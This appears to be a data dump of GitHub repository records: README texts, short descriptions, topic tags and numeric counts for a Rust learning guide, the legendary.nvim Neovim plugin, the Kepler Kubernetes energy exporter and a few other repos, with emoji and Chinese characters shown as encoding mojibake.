็ญ‰็ญ‰ๅŠŸ่ƒฝใ€‚ ### weapp-pandacss [weapp-pandacss](https://github.com/sonofmagic/weapp-pandacss) `CSS-in-JS` ็ผ–่ฏ‘ๆ—ถๆก†ๆžถ็š„ๅฐ็จ‹ๅบ้€‚้…ๅ™จ
bring tailwindcss to weapp ! ๆŠŠ `tailwindcss` ๅŽŸๅญๅŒ–ๆ€ๆƒณๅธฆๅ…ฅๅฐ็จ‹ๅบๅผ€ๅ‘ๅง ! ๅŽŸ `weapp-tailwindcss-webpack-plugin`
mp,weapp,tailwindcss,webpack,postcss,mini,tailwind,vite,tarojs,uni-app
29
2
170
1,595
16
48
3
jondot/rust-how-do-i-start
# Rust :crab:. How do I start? A collaborative advice for this casual question that gets asked many times, so here it is as a Github repo anyone can contribute to and improve! * ๐Ÿ‘๏ธ Before you start, watch this repo (Github watch button) so you can get updates when we add stuff * ๐Ÿ‘พ Play with this page first! Take an hour to look at all the stuff that's linked from top to bottom. Watch a few videos, scroll through a couple blogs. Then start with the main track. * ๐Ÿ‘ทโ€โ™€๏ธ While you're working your way through, feel free to ask questions about ways to start in Rust in [Discussions](https://github.com/jondot/rust-how-do-i-start/discussions) * ๐ŸŽŠ Feel free to add suggestions and PRs of your own https://github.com/jondot/rust-how-do-i-start#contributing ## ๐Ÿฑ What to expect? _Some hand-selected articles to give you a feeling of what's the journey like._ * [My own key learnings after 30k LOC in Rust](https://jondot.medium.com/my-key-learnings-after-30-000-loc-in-rust-a553e6403c19) - I can say that today the experience is much greater than back then. There's so much more to learn from, and the ecosystem is huge. Still, the core ideas in the article are relevant. # ๐Ÿšœ Main track _This is largely the learn path you should follow. It is hand-selected, minimal, and high-value, highly effective content only_ * ๐Ÿ“š Reading (code or text) * ๐Ÿ‹๏ธโ€โ™€๏ธ Exercise * ๐Ÿ—๏ธ Building 1. ๐Ÿฆ€ The ๐Ÿ“š[Rust Book](https://doc.rust-lang.org/book/). You can read it cover to cover, or skim it. What ever you do, make sure you have a pet project idea to experiment with. You can pick ๐Ÿ“š[any of the core utils you like](https://github.com/uutils/coreutils/tree/main/src/uu). The advantage of just re-implementing a core util is that you are probably familiar with one of those, they're just CLI apps and you're not biting more than you can chew, and you do have the source code in that repo for reference. * ๐ŸŽฌ Feeling a bit lost? You can watch [Getting Started with Rust: Understanding Rust Compile Errors](https://www.youtube.com/watch?v=hgZQJys2zpY), and [part 2](https://www.youtube.com/watch?v=9391GxkYPyY) which is a _great_ intro to errors, borrow checker and more. * ๐Ÿฅธ If you're coming from dynamic programming languages, expect the reading process to be less "flowing" and more thinking about types and the type system. If you're stuck and want to "translate" concepts to your own dynamic world, feel free to ask [here](https://github.com/jondot/rust-how-do-i-start/discussions) * ๐Ÿซถ You don't have to read it cover to cover. Get to a nice, working CLI app for starters. * ๐Ÿ‹๏ธโ€โ™€๏ธ If you like exercises as a learning aid, you can swap "building a small project" while reading the Rust book, with ๐Ÿ‹๏ธโ€โ™€๏ธ[rustlings](https://github.com/rust-lang/rustlings) 2. ๐Ÿงฐ Pick a hobby project that's useful for you. Something more than trivial that includes data passing and a few modules (just so you get to experience the borrow checker and data modeling) something in the scope of ๐Ÿ—๏ธ[bat](https://github.com/sharkdp/bat/tree/master/src). Work on it and go back to the Rust book from time to time (as well as, well - StackOverflow). Repeat, rinse. * ๐Ÿคทโ€โ™€๏ธ Don't have an idea for a hobby project? ๐Ÿ‹๏ธโ€โ™€๏ธ[PNGMe](https://picklenerd.github.io/pngme_book/introduction.html) is a good project to build + it's a book and exercise format. Look at the [project idea list](https://github.com/jondot/rust-how-do-i-start#-project-ideas) too. * ๐ŸŽฉ Don't want to work on a project at all? the ๐Ÿ‹๏ธโ€โ™€๏ธ[too many lists](https://rust-unofficial.github.io/too-many-lists/index.html) minibook will have you building linked-lists of all kinds and is quite good 3. ๐Ÿค Asking for feedback is highly encouraged to get better at writing idiomatic, readable and performant Rust. You can ask for feedback in [the Rust Subreddit](https://reddit.com/r/rust) or in [the Rust Programming Language Community Discord Server](https://discord.gg/rust-lang-community). 4. ๐Ÿ“ The ๐Ÿ“š[Rust API Guidelines](https://rust-lang.github.io/api-guidelines/) for why things are the way they are. E.g. why `into`, and why the `_mut` postfix. For understanding the Rust-"isms" around you when reading people's code. 5. ๐ŸŒฑ You're now ready for ๐Ÿ‹๏ธโ€โ™€๏ธ[Rust by example](https://github.com/rust-lang/rust-by-example) and ๐Ÿ‹๏ธโ€โ™€๏ธ[Rust by practice](https://github.com/sunface/rust-by-practice) 6. โซ ๐Ÿ“š[Rust patterns](https://rust-unofficial.github.io/patterns/intro.html) is a great intro to idioms in Rust 7. ๐Ÿš€ Next, ๐Ÿ“š[Zero to Production in Rust](https://www.zero2prod.com/) will give you some service-ish, production-ish use cases which will round off your experience 8. ๐Ÿค” When you feel curious about the "why's", pick up ๐Ÿ“š[Rust for Rustaceans](https://nostarch.com/rust-rustaceans). Skim it and read what's interesting to you, cover-to-cover is a hard read, unless you have the focus & time. From here, since everyone have their own taste, visit ๐Ÿ“š[Rust Books](https://lborb.github.io/book/) from time to time to pick up a resource that you feel can move you forward to the next step. ## ๐Ÿ“ฆ Starter libraries - save me from choosing ๐Ÿคฆโ€โ™€๏ธ! _These are opinionated but popular choices. The goal is to avoid [paradox of choice](https://en.wikipedia.org/wiki/The_Paradox_of_Choice) while learning._ * [anyhow](https://docs.rs/anyhow/latest/anyhow/) for error handling * [clap](https://docs.rs/clap/latest/clap/) for CLI building * [serde](https://serde.rs/) for serialization, including [serde_json](https://github.com/serde-rs/json) and [serde_yaml](https://github.com/dtolnay/serde-yaml) * [dialoguer](https://docs.rs/dialoguer/latest/dialoguer/) for CLI prompts and [console](https://crates.io/crates/console) for ANSI colors and handling * [env_logger](https://docs.rs/env_logger/latest/env_logger/) for logging and [log](https://docs.rs/log/latest/log/) for facade * [lazy_static](https://docs.rs/lazy_static/latest/lazy_static/) for declaring static variables that have nontrivial initialization * [rayon](https://github.com/rayon-rs/rayon) for easy concurrency for data, vectors, arrays based workloads * [reqwest](https://docs.rs/reqwest/latest/reqwest/) and [reqwest-middleware](https://crates.io/crates/reqwest-middleware) for HTTP calls * [actix-web](https://docs.rs/actix-web/latest/actix_web/) as a web/API server * [nom](https://crates.io/crates/nom) (parser combinators) or [pest](https://pest.rs/) (peg) for building custom parsers * [insta](https://crates.io/crates/insta), [wiremock](https://crates.io/crates/wiremock), and [fake](https://crates.io/crates/fake) for testing * [tap](https://crates.io/crates/tap) for utility ## :ok_hand: Thinking in Rust _Hand picked material to give you context, reasons, and history of how Rust evolved. Some of it is historical._ * [Rust Programming Techniques (youtube)](https://www.youtube.com/watch?v=vqavdUGKeb4) - a talk from 2018 which is more about "thinking in Rust", and will encourage using more Rust constructs. * [@jonhoo on Rust Trivia](https://github.com/rusty-ferris-club/jonhoo-rust-trivia) ([twitter: @jonhoo](https://twitter.com/jonhoo)) * [@jonhoo on Rust Keywords](https://github.com/rusty-ferris-club/jonhoo-rust-trivia/blob/main/keywords.md) ([twitter: @jonhoo](https://twitter.com/jonhoo)) * [Getting Started with Rust: Understanding Rust Compile Errors](https://www.youtube.com/watch?v=hgZQJys2zpY), and [part 2](https://www.youtube.com/watch?v=9391GxkYPyY) - A live session with Ryan Levick exploring and understanding compiler errors and the borrow checker ## ๐Ÿฅ‡ Gold Nuggets _Great articles, blogs, videos of specific topics in Rust, that are must-read or must-watch_ * [Error handling isn't all about errors](https://www.youtube.com/watch?v=rAF8mLI0naQ) - a talk from RustConf 2020, which gives a fantastic overview, breakdown and ultimate tips to error handling and error libraries in Rust ## ๐Ÿ’ก Project ideas _These are easy starter project ideas, not full-blown projects, just to get you up and running._ * `cat`, `grep`, `uniq`, `wc`, `find` + more. [in this repo](https://github.com/kyclark/command-line-rust) from the _Command line Rust_ book. -- `Practice` CLI, stdlib, data. `Difficulty` easy. * [A beefed up calculator](https://crates.io/crates/eva) -- `Practice` CLI, parsing, data. `Difficulty` easy. * [SMTP Protocol in Go - but implement in Rust](https://notes.eatonphil.com/handling-email-from-gmail-smtp-protocol-basics.html) and build a simple TCP server from scratch -- `Practice` CLI, parsing, services. `Difficulty` easy * [CloudFormation parser](https://rtoch.com/posts/advanced-serde/). -- `Practice` CLI, serde, errors, data. `Difficulty` medium. * [Realworld](https://github.com/gothinkster/realworld) implementation in Rust. See [realworld-axum-sqlx](https://github.com/launchbadge/realworld-axum-sqlx). -- `Practice` Web, services, SQL, data. `Difficulty` medium. * [QR code generator](https://github.com/madprops/qool) -- `Practice` CLI, modules, data. `Difficulty` medium. * [Redis protocol parser (RESP)](https://redis.io/docs/reference/protocol-spec/) -- `Practice` parsing, TDD, creating Rust libraries, data. `Difficulty` medium. * [Add a lint to Clippy](https://github.com/rust-lang/rust-clippy/blob/master/doc/adding_lints.md). Clippy is the Rust linter, and you might be using it all day long. How about add stuff to it?. `Practice` real world Rust, parsing, compilers. `Difficulty` hard. * [JSON log viewer, CLI](https://github.com/gistia/json-log-viewer) -- `Practice` CLI, TUI, modules, data, parsing. `Difficulty` hard. ## ๐Ÿค˜ Looking to work with other people _Find other people that are passionate and looking to build stuff in Rust for fun._ * [Rusty Ferris Club](https://github.com/rusty-ferris-club) builds tiny Rust based open source projects, and you can add your [ideas or requests](https://github.com/rusty-ferris-club/build-it-for-me-please) ## ๐Ÿคพโ€โ™‚๏ธ Hold on! I want to just play around before deciding to start _Some links to give you a feeling of Rust, if you're not ready to make the jump yet, or need some convincing to invest the time_ * Try the [tour of rust](https://tourofrust.com/index.html) * [A gentle intro to Rust](https://stevedonovan.github.io/rust-gentle-intro/readme.html) * [Take your first steps with Rust](https://docs.microsoft.com/en-us/learn/paths/rust-first-steps/) ## ๐Ÿ’ป Cool stuff to have open in a tab while working _If you have multiple screens, and like a full immersive learning experience - you can keep these open at all times_ * [A big cheatsheet](https://www.cheats.rs/) or [a smaller cheatsheet](https://upsuper.github.io/rust-cheatsheet/) * A fun [syntax explorer explainer](https://jrvidal.github.io/explaine.rs/) * [awesome-rust](https://github.com/rust-unofficial/awesome-rust) and [are we there yet](https://wiki.mozilla.org/Areweyet) for when you're reaching out for a library or need inspiration ## ๐Ÿš€ Releasing - [a CI/CD template for your project and crates](https://github.com/SpectralOps/rust-ci-release-template) to start with - [Documenting your crate](https://blog.guillaume-gomez.fr/articles/2020-03-12+Guide+on+how+to+write+documentation+for+a+Rust+crate) # Mental Bridges _These links will help bridge the mental model when you're coming from Node.js_ ## I'm a Node.js Developer 1. Add [Rust for node developers](https://github.com/Mercateo/rust-for-node-developers) to your schedule, which is a soft intro just to get your bearings. ## I'm a Python developer 1. Check out [From Python into Rust](https://github.com/rochacbruno/py2rs) # Contributing Please feel free to submit PRs to improve this list. A few pointers: 1. The list must be concise 2. If there are new tracks, feel free to open them by adding a new subtitle to this README and submit PR (i.e. "Rust for game developers, how do I start?") Happy hacking!
Hand curated advice and pointers for getting started with Rust
rust,rust-lang
0
3
2
33
0
1
0
mrjones2014/legendary.nvim
<div align="center"> # `legendary.nvim` [Features](#features) | [Prerequisites](#prerequisites) | [Installation](#installation) | [Quickstart](#quickstart) | [Configuration](#configuration) </div> Define your keymaps, commands, and autocommands as simple Lua tables, building a legend at the same time (like VS Code's Command Palette). ![demo gif](https://user-images.githubusercontent.com/8648891/200827633-7009f5f3-e126-491c-88bd-73a0287978c4.gif) \ <sup>Theme used in recording is [onedarkpro.nvim](https://github.com/olimorris/onedarkpro.nvim). The finder UI is handled by [telescope.nvim](https://github.com/nvim-telescope/telescope.nvim) via [dressing.nvim](https://github.com/stevearc/dressing.nvim). See [Prerequisites](#prerequisites) for details.</sup> **Table of Contents** - [Features](#features) - [Prerequisites](#prerequisites) - [Installation](#installation) - [Quickstart](#quickstart) - [Configuration](#configuration) - [Troubleshooting Frecency Sort](#troubleshooting-frecency-sort) - [Keymap Development Utilities](./doc/MAPPING_DEVELOPMENT.md) - [Lua API](./doc/API.md) - [Extensions](./doc/EXTENSIONS.md) - [Table Structures](./doc/table_structures/README.md) - [Keymaps](./doc/table_structures/KEYMAPS.md) - [Commands](./doc/table_structures/COMMANDS.md) - [Functions](./doc/table_structures/FUNCTIONS.md) - [`augroup`/`autocmd`s](./doc/table_structures/AUTOCMDS.md) ## Features - Define your keymaps, commands, `augroup`/`autocmd`s, and even arbitrary Lua functions to run on the fly, as simple Lua tables, then bind them with `legendary.nvim` - Integration with [which-key.nvim](https://github.com/folke/which-key.nvim), use your existing `which-key.nvim` tables with `legendary.nvim` (see [extensions](./doc/EXTENSIONS.md#which-keynvim)) - Integration with [lazy.nvim](https://github.com/folke/lazy.nvim), automatically load keymaps defined via `lazy.nvim`'s `keys` property on plugin specs (see [extensions](./doc/EXTENSIONS.md#lazynvim)) - Execute normal, insert, and visual mode keymaps, commands, autocommands, and Lua functions when you select them - Show your most recently executed items at the top when triggered via `legendary.nvim` (can be disabled via config) - Uses `vim.ui.select()` so it can be hooked up to a fuzzy finder using something like [dressing.nvim](https://github.com/stevearc/dressing.nvim) for a VS Code command palette like interface - Buffer-local keymaps, commands, functions and autocmds only appear in the finder for the current buffer - Help execute commands that take arguments by prefilling the command line instead of executing immediately - Search built-in keymaps and commands along with your user-defined keymaps and commands (may be disabled in config). Notice some missing? Comment on [this discussion](https://github.com/mrjones2014/legendary.nvim/discussions/89) or submit a PR! - A `legendary.toolbox` module to help create lazily-evaluated keymaps and commands, and item filter. Have an idea for a new helper? Comment on [this discussion](https://github.com/mrjones2014/legendary.nvim/discussions/90) or submit a PR! - Sort by [frecency](https://en.wikipedia.org/wiki/Frecency), a combined measure of how frequently and how recently you've used an item from the picker - A parser to convert Vimscript keymap commands (e.g. `vnoremap <silent> <leader>f :SomeCommand<CR>`) to `legendary.nvim` keymap tables (see [Converting Keymaps From Vimscript](./doc/API.md#converting-keymaps-from-vimscript)) - Anonymous mappings; show mappings/commands in the finder without having `legendary.nvim` handle creating them - Extensions to automatically load keymaps and commands from other plugins ## Prerequisites - (Optional) A `vim.ui.select()` handler; this provides the UI for the finder. - I recommend [telescope.nvim](https://github.com/nvim-telescope/telescope.nvim) paired with [dressing.nvim](https://github.com/stevearc/dressing.nvim). ## Installation This project uses git tags to adhere to [Semantic Versioning](https://semver.org/). To check the latest version, see the [git tag list](https://github.com/mrjones2014/legendary.nvim/tags). With `lazy.nvim`: ```lua -- to use a version { 'mrjones2014/legendary.nvim', version = 'v2.13.9', -- since legendary.nvim handles all your keymaps/commands, -- its recommended to load legendary.nvim before other plugins priority = 10000, lazy = false, -- sqlite is only needed if you want to use frecency sorting -- dependencies = { 'kkharji/sqlite.lua' } } -- or, to get rolling updates { 'mrjones2014/legendary.nvim', -- since legendary.nvim handles all your keymaps/commands, -- its recommended to load legendary.nvim before other plugins priority = 10000, lazy = false, -- sqlite is only needed if you want to use frecency sorting -- dependencies = { 'kkharji/sqlite.lua' } } ``` With `vim-plug`: ```VimL " if you want to use frecency sorting, sqlite is also needed Plug "kkharji/sqlite.lua" " to use a version Plug "mrjones2014/legendary.nvim", { 'tag': 'v2.1.0' } " or, to get rolling updates Plug "mrjones2014/legendary.nvim" ``` ## Quickstart If you use [lazy.nvim](https://github.com/folke/lazy.nvim) for your plugin manager, `legendary.nvim` can automatically register keymaps defined via the `keys` property of `lazy.nvim` plugin specs. This lets you keep your plugin-specific keymaps where you define the plugin, and `legendary.nvim` automatically detects them. For example: ```lua -- in a plugin spec: { 'folke/flash.nvim', keys = { { 's', function() require('flash').jump() end, mode = { 'n', 'x', 'o' }, desc = 'Jump forwards', }, { 'S', function() require('flash').jump({ search = { forward = false } }) end, mode = { 'n', 'x', 'o' }, desc = 'Jump backwards', }, }, } -- where you set up legendary.nvim -- now the keymaps from the `flash.nvim` plugin spec will be automatically loaded require('legendary').setup({ extensions = { lazy_nvim = true } }) ``` Otherwise, register keymaps, commands, autocmds, and functions through setup, including opting into _extensions_ which can automatically load keymaps and commands from other plugins: ```lua require('legendary').setup({ keymaps = { -- map keys to a command { '<leader>ff', ':Telescope find_files', description = 'Find files' }, -- map keys to a function { '<leader>h', function() print('hello world!') end, description = 'Say hello', }, -- Set options used during keymap creation { '<leader>s', ':SomeCommand<CR>', description = 'Non-silent keymap', opts = { silent = true } }, -- create keymaps with different implementations per-mode { '<leader>c', { n = ':LinewiseCommentToggle<CR>', x = ":'<,'>BlockwiseCommentToggle<CR>" }, description = 'Toggle comment', }, -- create item groups to create sub-menus in the finder -- note that only keymaps, commands, and functions -- can be added to item groups { -- groups with same itemgroup will be merged itemgroup = 'short ID', description = 'A submenu of items...', icon = '๏ผ', keymaps = { -- more keymaps here }, }, -- in-place filters, see :h legendary-tables or ./doc/table_structures/README.md { '<leader>m', description = 'Preview markdown', filters = { ft = 'markdown' } }, }, commands = { -- easily create user commands { ':SayHello', function() print('hello world!') end, description = 'Say hello as a command', }, { -- groups with same itemgroup will be merged itemgroup = 'short ID', -- don't need to copy the other group data because -- it will be merged with the one from the keymaps table commands = { -- more commands here }, }, -- in-place filters, see :h legendary-tables or ./doc/table_structures/README.md { ':Glow', description = 'Preview markdown', filters = { ft = 'markdown' } }, }, funcs = { -- Make arbitrary Lua functions that can be executed via the item finder { function() doSomeStuff() end, description = 'Do some stuff with a Lua function!', }, { -- groups with same itemgroup will be merged itemgroup = 'short ID', -- don't need to copy the other group data because -- it will be merged with the one from the keymaps table funcs = { -- more funcs here }, }, }, autocmds = { -- Create autocmds and augroups { 'BufWritePre', vim.lsp.buf.format, description = 'Format on save' }, { name = 'MyAugroup', clear = true, -- autocmds here }, }, -- load extensions extensions = { -- automatically load keymaps from lazy.nvim's `keys` option lazy_nvim = true, -- load keymaps and commands from nvim-tree.lua nvim_tree = true, -- load commands from smart-splits.nvim -- and create keymaps, see :h legendary-extensions-smart-splits.nvim smart_splits = { directions = { 'h', 'j', 'k', 'l' }, mods = { move = '<C>', resize = '<M>', }, }, -- load commands from op.nvim op_nvim = true, -- load keymaps from diffview.nvim diffview = true, }, }) ``` For more mapping features and more complicated setups see [Table Structures](./doc/table_structures/README.md). To trigger the finder for your configured keymaps, commands, `augroup`/`autocmd`s, and Lua functions: Commands: ```VimL " search keymaps, commands, and autocmds :Legendary " search keymaps :Legendary keymaps " search commands :Legendary commands " search functions :Legendary functions " search autocmds :Legendary autocmds " repeat the last item executed via legendary.nvim's finder; " by default, only executes if the last set of item filters used still returns `true` :LegendaryRepeat " repeat the last item executed via legendary.nvim's finder, ignoring the filters used :LegendaryRepeat! ``` Lua API: The `require('legendary').find()` function takes an `opts` table with the following fields (all optional): ```lua { -- pass a list of filter functions or a single filter function with -- the signature `function(item, context): boolean` -- (see below for `context` definition) -- several filter functions are provided for convenience -- see ./doc/FILTERS.md for a list filters = {}, -- pass a function with the signature `function(item, mode): string[]` -- returning a list of strings where each string is one column -- use this to override the configured formatter for just one call formatter = nil, -- pass a string, or a function that returns a string -- to customize the select prompt for the current call select_prompt = nil, } ``` The `context` table passed to filters contains the following properties: ```lua { buf = number, -- buffer ID buftype = string, filetype = string, mode = string, -- the mode that the UI was triggered from cursor_pos = table, -- { row, col } marks = table, -- visual mode marks, if applicable; { line, col, line, col } } ``` See [USAGE_EXAMPLES.md](./doc/USAGE_EXAMPLES.md) for some advanced usage examples. ## Configuration Default configuration is shown below. For a detailed explanation of the structure for keymap, command, and `augroup`/`autocmd` tables, see [doc/table_structures/README.md](./doc/table_structures/README.md). ```lua require('legendary').setup({ -- Initial keymaps to bind, can also be a function that returns the list keymaps = {}, -- Initial commands to bind, can also be a function that returns the list commands = {}, -- Initial augroups/autocmds to bind, can also be a function that returns the list autocmds = {}, -- Initial functions to bind, can also be a function that returns the list funcs = {}, -- Initial item groups to bind, -- note that item groups can also -- be under keymaps, commands, autocmds, or funcs; -- can also be a function that returns the list itemgroups = {}, -- default opts to merge with the `opts` table -- of each individual item default_opts = { -- for example, { silent = true, remap = false } keymaps = {}, -- for example, { args = '?', bang = true } commands = {}, -- for example, { buf = 0, once = true } autocmds = {}, }, -- Customize the prompt that appears on your vim.ui.select() handler -- Can be a string or a function that returns a string. select_prompt = '๎ช† legendary.nvim ๎ช†', -- Character to use to separate columns in the UI col_separator_char = 'โ”‚', -- Optionally pass a custom formatter function. This function -- receives the item as a parameter and the mode that legendary -- was triggered from (e.g. `function(item, mode): string[]`) -- and must return a table of non-nil string values for display. -- It must return the same number of values for each item to work correctly. -- The values will be used as column values when formatted. -- See function `default_format(item)` in -- `lua/legendary/ui/format.lua` to see default implementation. default_item_formatter = nil, -- Customize icons used by the default item formatter icons = { -- keymap items list the modes in which the keymap applies -- by default, you can show an icon instead by setting this to -- a non-nil icon keymap = nil, command = '๏„ ', fn = '๓ฐกฑ', itemgroup = '๏ผ', }, -- Include builtins by default, set to false to disable include_builtin = true, -- Include the commands that legendary.nvim creates itself -- in the legend by default, set to false to disable include_legendary_cmds = true, -- Options for list sorting. Note that fuzzy-finders will still -- do their own sorting. For telescope.nvim, you can set it to use -- `require('telescope.sorters').fuzzy_with_index_bias({})` when -- triggered via `legendary.nvim`. Example config for `dressing.nvim`: -- -- require('dressing').setup({ -- select = { -- get_config = function(opts) -- if opts.kind == 'legendary.nvim' then -- return { -- telescope = { -- sorter = require('telescope.sorters').fuzzy_with_index_bias({}) -- } -- } -- else -- return {} -- end -- end -- } -- }) sort = { -- put most recently selected item first, this works -- both within global and item group lists most_recent_first = true, -- sort user-defined items before built-in items user_items_first = true, -- sort the specified item type before other item types, -- value must be one of: 'keymap', 'command', 'autocmd', 'group', nil item_type_bias = nil, -- settings for frecency sorting. -- https://en.wikipedia.org/wiki/Frecency -- Set `frecency = false` to disable. -- this feature requires sqlite.lua (https://github.com/kkharji/sqlite.lua) -- and will be automatically disabled if sqlite is not available. -- NOTE: THIS TAKES PRECEDENCE OVER OTHER SORT OPTIONS! frecency = { -- the directory to store the database in db_root = string.format('%s/legendary/', vim.fn.stdpath('data')), -- the maximum number of timestamps for a single item -- to store in the database max_timestamps = 10, }, }, lazy_nvim = { -- Automatically register keymaps that are defined on lazy.nvim plugin specs -- using the `keys = {}` property. auto_register = false, }, which_key = { -- Automatically add which-key tables to legendary -- see ./doc/WHICH_KEY.md for more details auto_register = false, -- you can put which-key.nvim tables here, -- or alternatively have them auto-register, -- see ./doc/WHICH_KEY.md mappings = {}, opts = {}, -- controls whether legendary.nvim actually binds they keymaps, -- or if you want to let which-key.nvim handle the bindings. -- if not passed, true by default do_binding = true, -- controls whether to use legendary.nvim item groups -- matching your which-key.nvim groups; if false, all keymaps -- are added at toplevel instead of in a group. use_groups = true, }, -- Which extensions to load; no extensions are loaded by default. -- Setting the plugin name to `false` disables loading the extension. -- Setting it to any other value will attempt to load the extension, -- and pass the value as an argument to the extension, which should -- be a single function. Extensions are modules under `legendary.extensions.*` -- which return a single function, which is responsible for loading and -- initializing the extension. extensions = { nvim_tree = false, smart_splits = false, op_nvim = false, diffview = false, }, scratchpad = { -- How to open the scratchpad buffer, -- 'current' for current window, 'float' -- for floating window view = 'float', -- How to show the results of evaluated Lua code. -- 'print' for `print(result)`, 'float' for a floating window. results_view = 'float', -- Border style for floating windows related to the scratchpad float_border = 'rounded', -- Whether to restore scratchpad contents from a cache file keep_contents = true, }, -- Directory used for caches cache_path = string.format('%s/legendary/', vim.fn.stdpath('cache')), -- Log level, one of 'trace', 'debug', 'info', 'warn', 'error', 'fatal' log_level = 'info', }) ``` ### Troubleshooting Frecency Sort If you get an error along the lines of the following, and frecency sorting does not work: ``` Failed to open database at /Users/mat/.local/share/nvim/legendary/legendary_frecency.sqlite3: ...at/.local/share/nvim/lazy/sqlite.lua/lua/sqlite/defs.lua:56: dlopen(lib.dylib, 0x0005): tried: 'lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OSlib.dylib' (no such file), '/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/nix/store/092zx4zf4fmj0jyk32jl1ihix6q4bmw4-apple-framework-CoreFoundation-11.0.0/Library/Frameworks/lib.dylib' (no such file), '/usr/lib/lib.dylib' (no such file, not in dyld cache), 'lib.dylib' (no such file), '/usr/local/lib/lib.dylib' (no such file), '/usr/lib/lib.dylib' (no such file, not in dyld cache) ``` This means that the `sqlite.lua` Lua library was unable to find the `libsqlite3.dylib` shared library file. This could be the case for a few reasons. To fix this, you can either set `vim.g.sqlite_clib_path` in your Neovim config, or the `LIBSQLITE` environment variable to the full path to `libsqlite3.dylib`. If you are using Nix with `home-manager`, this can be done like so: ```nix { home.sessionVariables = { LIBSQLITE = "${pkgs.sqlite.out}/lib/libsqlite3.dylib"; }; } ``` If you are _not_ using Nix, you can locate the `libsqlite3.dylib` on macOS by running: ```shell otool -L $(which sqlite3) | grep "sqlite3.dylib" ``` --- Additional documentation can be found under [doc/](./doc/).
๐Ÿ—บ๏ธ A legend for your keymaps, commands, and autocmds, integrates with which-key.nvim, lazy.nvim, and more.
neovim,neovim-plugin,keymap,neovim-ui,legend,keymapping,keybindings,vim-commands,which-key,nvim
37
13
269
973
9
1
5
openai/dalle-2-preview
null
null
null
0
56
7
7
21
1
0
sustainable-computing-io/kepler
<img align="right" width="250px" src="https://user-images.githubusercontent.com/17484350/138557170-d8079b94-a517-4366-ade8-8d473e3f3f1d.jpg"> ![GitHub Workflow Status (event)](https://img.shields.io/github/actions/workflow/status/sustainable-computing-io/kepler/unit_test.yml?branch=main&label=CI) [![codecov](https://codecov.io/gh/sustainable-computing-io/kepler/graph/badge.svg?token=K9BDX9M86E)](https://codecov.io/gh/sustainable-computing-io/kepler) [![OpenSSF Best Practices](https://bestpractices.coreinfrastructure.org/projects/7391/badge)](https://bestpractices.coreinfrastructure.org/projects/7391)[![OpenSSF Scorecard](https://api.securityscorecards.dev/projects/github.com/sustainable-computing-io/kepler/badge)](https://securityscorecards.dev/viewer/?uri=github.com/sustainable-computing-io/kepler) <!-- [![GoDoc](https://godoc.org/github.com/kubernetes/kube-state-metrics?status.svg)](https://godoc.org/github.com/kubernetes/kube-state-metrics) --> [![License][apache2-badge]][apache2-url] [![License][bsd2-badge]][bsd2-url] [![License][gpl-badge]][gpl-url] [![Twitter URL](https://img.shields.io/twitter/url/https/twitter.com/KeplerProject.svg?style=social&label=Follow%20%40KeplerProject)](https://twitter.com/KeplerProject) [apache2-badge]: https://img.shields.io/badge/License-Apache%202.0-blue.svg [apache2-url]: https://opensource.org/licenses/Apache-2.0 [bsd2-badge]: https://img.shields.io/badge/License-BSD%202--Clause-orange.svg [bsd2-url]: https://opensource.org/licenses/BSD-2-Clause [gpl-badge]: https://img.shields.io/badge/License-GPL%20v2-blue.svg [gpl-url]: https://opensource.org/licenses/GPL-2.0 # Kepler Kepler (Kubernetes Efficient Power Level Exporter) uses eBPF to probe energy-related system stats and exports them as Prometheus metrics. As a CNCF Sandbox project, Kepler uses [CNCF Code of Conduct](https://github.com/cncf/foundation/blob/main/code-of-conduct.md) ## Architecture Kepler Exporter exposes a variety of [metrics](https://sustainable-computing.io/design/metrics/) about the energy consumption of Kubernetes components such as Pods and Nodes. ![Architecture](doc/kepler-arch.png) ## Install Kepler Instructions to install Kepler can be found in the [Kepler docs](https://sustainable-computing.io/installation/kepler/). ## Visualise Kepler metrics with Grafana To visualise the power consumption metrics made available by the Kepler Exporter, import the pre-generated [Kepler Dashboard](grafana-dashboards/Kepler-Exporter.json) into Grafana: ![Sample Grafana dashboard](doc/dashboard.png) ## Contribute to Kepler Interested in contributing to Kepler? Follow the [Contributing Guide](CONTRIBUTING.md) to get started! ## Talks & Demos - [Kepler Demo](https://www.youtube.com/watch?v=P5weULiBl60) - ["Sustainability the Container Native Way" - Open Source Summit NA 2022](doc/OSS-NA22.pdf) A full list of talks and demos about Kepler can be found [here](https://github.com/sustainable-computing-io/kepler-doc/tree/main/demos). ## Community Meetings Please join the biweekly community meetings. The meeting calendar and agenda can be found [here](https://github.com/sustainable-computing-io/community/blob/main/community-event.md) ## License With the exception of eBPF code, everything is distributed under the terms of the [Apache License (version 2.0)]. ### eBPF All eBPF code is distributed under either: - The terms of the [GNU General Public License, Version 2] or the [BSD 2 Clause license], at your option. - The terms of the [GNU General Public License, Version 2]. The exact license text varies by file. Please see the SPDX-License-Identifier header in each file for details. Files that originate from the authors of kepler use (GPL-2.0-only OR BSD-2-Clause). Files generated from the Linux kernel i.e vmlinux.h use GPL-2.0-only. Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion in this project by you, as defined in the GPL-2 license, shall be dual licensed as above, without any additional terms or conditions. [Apache License (version 2.0)]: LICENSE-APACHE [BSD 2 Clause license]: LICENSE-BSD-2 [GNU General Public License, Version 2]: LICENSE-GPL-2
Kepler (Kubernetes-based Efficient Power Level Exporter) uses eBPF to probe performance counters and other system stats, use ML models to estimate workload energy consumption based on these stats, and exports them as Prometheus metrics
kubernetes,sustainability,ebpf,prometheus-exporter,energy-consumption,energy-monitor,energy-efficiency,prometheus,cloud-native,machine-learning
32
50
1,029
2,242
64
33
21
0x5bfa/FluentHub
